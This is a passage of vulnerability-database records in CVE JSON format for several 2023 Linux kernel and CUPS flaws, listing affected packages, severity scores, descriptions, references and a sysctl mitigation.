Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::realtime", "cpe:/a:redhat:rhel_eus:9.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.rt14.337.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.95.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-02-10T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A memory leak problem was found in ctnetlink_create_conntrack in net/netfilter/nf_conntrack_netlink.c in the Linux Kernel. This issue may allow a local attacker with CAP_NET_ADMIN privileges to cause a denial of service (DoS) attack due to a refcount overflow." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-401", "description": "Missing Release of Memory after Effective Lifetime", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-16T17:01:37.373Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:1188", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1188" }, { "name": "RHSA-2024:1250", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1250" }, { "name": "RHSA-2024:1306", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1306" }, { "name": "RHSA-2024:1367", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1367" }, { "name": "RHSA-2024:1382", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1382" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:2006", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2006" }, { "name": "RHSA-2024:2008", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2008" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-7192" }, { "name": "RHBZ#2256279", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256279" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=ac4893980bbe79ce383daf9a0885666a30fe4c83" } ], "timeline": [ { "lang": "en", "time": "2023-09-13T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-02-10T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: refcount leak in ctnetlink_create_conntrack()", "workarounds": [ { "lang": "en", "value": "Triggering this issue requires the ability to create user/net namespaces.\n\nOn non-containerized deployments of Red Hat Enterprise Linux 8, you can disable user namespaces by setting user.max_user_namespaces to 0:\n\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use this mitigation as the functionality is needed to be enabled.\n\nAlternatively, skip loading the affected netfilter module (i.e., nf_conntrack_netlink) onto the system until we have a fix available. This can be done by a blacklist mechanism which will ensure the driver is not loaded at boot time.\n~~~\nHow do I blacklist a kernel module to prevent it from loading automatically?\nhttps://access.redhat.com/solutions/41278 \n~~~" } ], "x_redhatCweChain": "CWE-401: Missing Release of Memory after Effective Lifetime" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-7192", "datePublished": "2024-01-02T19:02:45.371Z", "dateReserved": "2023-12-30T18:12:05.167Z", "dateUpdated": "2024-09-16T17:01:37.373Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-32324
Vulnerability from cvelistv5
Published
2023-06-01 16:04
Modified
2024-08-02 15:10
Severity ?
EPSS score ?
Summary
OpenPrinting CUPS vulnerable to heap buffer overflow
References
Impacted products
▼ | Vendor | Product |
---|---|---|
OpenPrinting | cups |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T15:10:24.898Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-cxc6-w2g7-69p7", "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-cxc6-w2g7-69p7" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "cups", "vendor": "OpenPrinting", "versions": [ { "status": "affected", "version": "\u003c= 2.4.2" } ] } ], "descriptions": [ { "lang": "en", "value": "OpenPrinting CUPS is an open source printing system. In versions 2.4.2 and prior, a heap buffer overflow vulnerability would allow a remote attacker to launch a denial of service (DoS) attack. A buffer overflow vulnerability in the function `format_log_line` could allow remote attackers to cause a DoS on the affected system. Exploitation of the vulnerability can be triggered when the configuration file `cupsd.conf` sets the value of `loglevel `to `DEBUG`. No known patches or workarounds exist at time of publication." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-122", "description": "CWE-122: Heap-based Buffer Overflow", "lang": "en", "type": "CWE" } ] }, { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787: Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-06-01T16:04:10.994Z", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-cxc6-w2g7-69p7", "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-cxc6-w2g7-69p7" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00001.html" } ], "source": { "advisory": "GHSA-cxc6-w2g7-69p7", "discovery": "UNKNOWN" }, "title": "OpenPrinting CUPS vulnerable to heap buffer overflow" } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2023-32324", "datePublished": "2023-06-01T16:04:10.994Z", "dateReserved": "2023-05-08T13:26:03.880Z", "dateUpdated": "2024-08-02T15:10:24.898Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4623
Vulnerability from cvelistv5
Published
2023-09-06 13:56
Modified
2024-08-02 07:31
Severity ?
EPSS score ?
Summary
Use-after-free in Linux kernel's net/sched: sch_hfsc (HFSC qdisc traffic control) component
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:31:06.625Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/b3d26c5702c7d6c45456326e56d2ccf3f103e60f" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThan": "6.6", "status": "affected", "version": "2.6.12", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Budimir Markovic" } ], "datePublic": "2023-08-26T01:57:54+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: sch_hfsc (HFSC qdisc traffic control) component can be exploited to achieve local privilege escalation.\n\nIf a class with a link-sharing curve (i.e. with the HFSC_FSC flag set) has a parent without a link-sharing curve, then init_vf() will call vttree_insert() on the parent, but vttree_remove() will be skipped in update_vf(). This leaves a dangling pointer that can cause a use-after-free.\n\nWe recommend upgrading past commit b3d26c5702c7d6c45456326e56d2ccf3f103e60f.\n\n" } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-09-06T13:56:57.295Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "tags": [ "patch" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f" }, { "url": "https://kernel.dance/b3d26c5702c7d6c45456326e56d2ccf3f103e60f" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "source": { "discovery": "EXTERNAL" }, "title": "Use-after-free in Linux kernel\u0027s net/sched: sch_hfsc (HFSC qdisc traffic control) component", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-4623", "datePublished": "2023-09-06T13:56:57.295Z", "dateReserved": "2023-08-30T11:58:12.267Z", "dateUpdated": "2024-08-02T07:31:06.625Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-2513
Vulnerability from cvelistv5
Published
2023-05-08 00:00
Modified
2024-08-02 06:26
Severity ?
EPSS score ?
Summary
A use-after-free vulnerability was found in the Linux kernel's ext4 filesystem in the way it handled the extra inode size for extended attributes. This flaw could allow a privileged local user to cause a system crash or other undefined behaviors.
References
Impacted products
▼ | Vendor | Product |
---|---|---|
n/a | Linux kernel ext4 filesystem |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:26:09.163Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20220616021358.2504451-1-libaokun1%40huawei.com/" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/67d7d8ad99be" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2193097" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel ext4 filesystem", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in kernel 6.0-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability was found in the Linux kernel\u0027s ext4 filesystem in the way it handled the extra inode size for extended attributes. This flaw could allow a privileged local user to cause a system crash or other undefined behaviors." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-08T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/all/20220616021358.2504451-1-libaokun1%40huawei.com/" }, { "url": "https://github.com/torvalds/linux/commit/67d7d8ad99be" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2193097" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-2513", "datePublished": "2023-05-08T00:00:00", "dateReserved": "2023-05-04T00:00:00", "dateUpdated": "2024-08-02T06:26:09.163Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6535
Vulnerability from cvelistv5
Published
2024-02-07 21:04
Modified
2024-09-13 23:30
Severity ?
EPSS score ?
Summary
Kernel: null pointer dereference in nvmet_tcp_execute_request
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:0723 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0724 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0725 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0881 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0897 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1248 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2094 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3810 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6535 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2254053 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-6535", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-08T17:12:36.607009Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:22:56.873Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T08:35:14.548Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0724", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0724" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "name": "RHSA-2024:3810", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3810" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6535" }, { "name": "RHBZ#2254053", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254053" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240415-0003/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.rt7.320.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.58.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.2::baseos", "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.rt14.337.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.91.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-22", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-11", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-407", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-479", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-247", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-5", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-227", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-470", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-14", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-2", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-24", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": 